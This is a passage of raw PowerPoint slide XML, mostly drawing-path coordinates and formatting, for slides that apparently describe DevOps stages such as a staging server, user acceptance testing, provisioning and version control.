                <a:path w="292100" h="335279">
                  <a:moveTo>
                    <a:pt x="0" y="251459"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291592" y="251459"/>
                  </a:lnTo>
                </a:path>
                <a:path w="292100" h="335279">
                  <a:moveTo>
                    <a:pt x="0" y="167639"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291592" y="167639"/>
                  </a:lnTo>
                </a:path>
                <a:path w="292100" h="335279">
                  <a:moveTo>
                    <a:pt x="0" y="335279"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="291592" y="335279"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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26351" y="6601967"/>
              <a:ext cx="294131" cy="295656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3947922" y="6456552"/>
              <a:ext cx="5531485" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5531484" h="142875">
                  <a:moveTo>
                    <a:pt x="1582928" y="71501"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1554251" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1440053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1440053" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1440053" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1440053" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1554454" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1582928" y="71501"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5531484" h="142875">
                  <a:moveTo>
                    <a:pt x="5531485" y="71501"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5502808" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5388610" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5388610" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3073908" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3073908" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5388610" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5388610" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5503011" y="85725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5531485" y="71501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9541001" y="6058661"/>
              <a:ext cx="692150" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="692150" h="855345">
                  <a:moveTo>
                    <a:pt x="576579" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691896" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691896" y="115315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5765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9541001" y="6058661"/>
              <a:ext cx="692150" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="692150" h="855345">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="576579" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691896" y="115315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691896" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85496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9652253" y="6247637"/>
              <a:ext cx="487045" cy="523240"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="487045" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487045" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="131063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="131063"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487045" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="391668"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="391668"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487045" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="262128"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="262128"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487045" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="522731"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="522731"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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14559" y="6586727"/>
              <a:ext cx="492251" cy="460248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3096493" y="6058661"/>
              <a:ext cx="693420" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="693419" h="855345">
                  <a:moveTo>
                    <a:pt x="577850" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693419" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693419" y="115569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577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3096493" y="6058661"/>
              <a:ext cx="693420" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="693419" h="855345">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="577850" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693419" y="115569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693419" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85496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3209269" y="6247637"/>
              <a:ext cx="487045" cy="523240"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="487044" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487044" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="131063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="131063"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487044" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="391668"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="391668"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487044" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="262128"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="262128"/>
                  </a:lnTo>
                </a:path>
                <a:path w="487044" h="523240">
                  <a:moveTo>
                    <a:pt x="0" y="522731"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="487045" y="522731"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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71576" y="6586727"/>
              <a:ext cx="492251" cy="460248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9494646" y="2817367"/>
            <a:ext cx="77152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9690" marR="5080" indent="-47625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404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sta</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-20" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ng  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="20" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server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2933680" y="3061207"/>
            <a:ext cx="67691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5" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Serve</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="100" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:endParaRPr sz="16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9069069" y="5290820"/>
            <a:ext cx="170878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86409" marR="5080" indent="-474345">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="20" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-90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600" spc="15" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Acceptance </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-425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600" spc="10" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Testing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267967" y="7830311"/>
            <a:ext cx="6788150" cy="405765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="39405A"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="7048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55"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Dev</a:t>
            </a:r>
            <a:endParaRPr sz="16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182356" y="7830311"/>
            <a:ext cx="6786880" cy="405765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0075C4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="70485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555"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ops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25417" y="306451"/>
            <a:ext cx="88042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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Provisioning,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Deprovisioning,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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05">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Version</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Control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37004" y="760476"/>
            <a:ext cx="12420600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54885" y="1933193"/>
            <a:ext cx="1315021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Following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automation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tasks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used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testing,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deployment,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maintenance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application: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293000" y="2768803"/>
            <a:ext cx="2189480" cy="5626100"/>
            <a:chOff x="4293000" y="2768803"/>
            <a:chExt cx="2189480" cy="5626100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4293000" y="2768803"/>
              <a:ext cx="2189480" cy="5626100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2189479" h="5626100">
                  <a:moveTo>
                    <a:pt x="92436" y="5562600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="29317" y="5613400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113010" y="5626100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104780" y="5600700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92182" y="5600700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88753" y="5588000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100665" y="5588000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92436" y="5562600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2189479" h="5626100">
                  <a:moveTo>
                    <a:pt x="100665" y="5588000"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88753" y="5588000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92182" y="5600700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104780" y="5600700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100665" y="5588000"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2189479" h="5626100">
                  <a:moveTo>
                    <a:pt x="75095" y="37986"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74529" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74119" y="51555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107803" y="63500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178542" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248265" y="101600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316972" y="127000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384917" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451592" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517505" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="582148" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708640" y="317500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708386" y="317500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830814" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830560" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="948416" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="948162" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1061573" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1061319" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170031" y="635000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1169777" y="635000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273790" y="723900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1273536" y="723900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1372469" y="825500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1372215" y="825500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466195" y="927100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465941" y="927100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1554714" y="1041400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1554460" y="1041400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1637772" y="1143000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1715496" y="1257300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1787632" y="1384300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1787505" y="1384300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1854053" y="1498600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1914759" y="1625600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1942826" y="1689100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969369" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969242" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994388" y="1816100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2018010" y="1879600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2039981" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2039854" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2060301" y="2019300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2079097" y="2082800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096369" y="2146300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2096242" y="2146300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111863" y="2222500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2125833" y="2286000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2138279" y="2349500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2148820" y="2425700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2157837" y="2489200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2165076" y="2565400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170664" y="2628900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2174474" y="2705100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2176506" y="2768600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2176760" y="2844800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2175363" y="2921000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2172188" y="2984500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2166981" y="3060700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160123" y="3136899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2151360" y="3200399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2140819" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128246" y="3352800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2113895" y="3416300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2097639" y="3492500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2079478" y="3568700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052935" y="3657600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2023598" y="3746500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1991086" y="3835400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1955907" y="3924300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1917807" y="4013200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1877040" y="4102100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1833606" y="4191000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1787378" y="4267200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1738737" y="4356100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1687429" y="4432300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1633581" y="4508500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1577447" y="4584700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1518900" y="4660900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1457940" y="4724400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394821" y="4800600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1329416" y="4864100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1329543" y="4864100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1261852" y="4927600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1192256" y="4991100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1120628" y="5054600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046968" y="5105400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971403" y="5168900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893806" y="5219700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="894060" y="5219700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="814558" y="5270500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="814812" y="5270500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733532" y="5321300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650728" y="5372100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566273" y="5410200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480167" y="5448300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480421" y="5448300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392537" y="5486400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392791" y="5486400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303383" y="5524500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303637" y="5524500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212832" y="5549900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213086" y="5549900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121011" y="5588000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100665" y="5588000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104780" y="5600700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124694" y="5600700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217023" y="5562600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307955" y="5537200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485501" y="5461000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571988" y="5422900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656824" y="5372100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="739882" y="5334000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821416" y="5283200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="900918" y="5232400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978896" y="5181600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1054715" y="5118100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128756" y="5067300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1200765" y="5003800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1270615" y="4940300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1338433" y="4876800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1404092" y="4800600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1467592" y="4737100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1528679" y="4660900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1587480" y="4584700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1643995" y="4508500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1697970" y="4432300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1749532" y="4356100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798427" y="4279900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1844782" y="4191000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1888470" y="4102100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1929491" y="4025900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967591" y="3937000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2003024" y="3848100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2035663" y="3759200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2065127" y="3657600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2091797" y="3568700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2109958" y="3492500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126341" y="3429000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2140819" y="3352800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2153265" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2164060" y="3200399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2172823" y="3136899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2179681" y="3060700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2184761" y="2984500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2188063" y="2921000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2189460" y="2844800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2189206" y="2768600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2187047" y="2705100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2183237" y="2628900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2177776" y="2565400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170410" y="2489200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2161393" y="2425700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150725" y="2349500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2138279" y="2286000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2124309" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
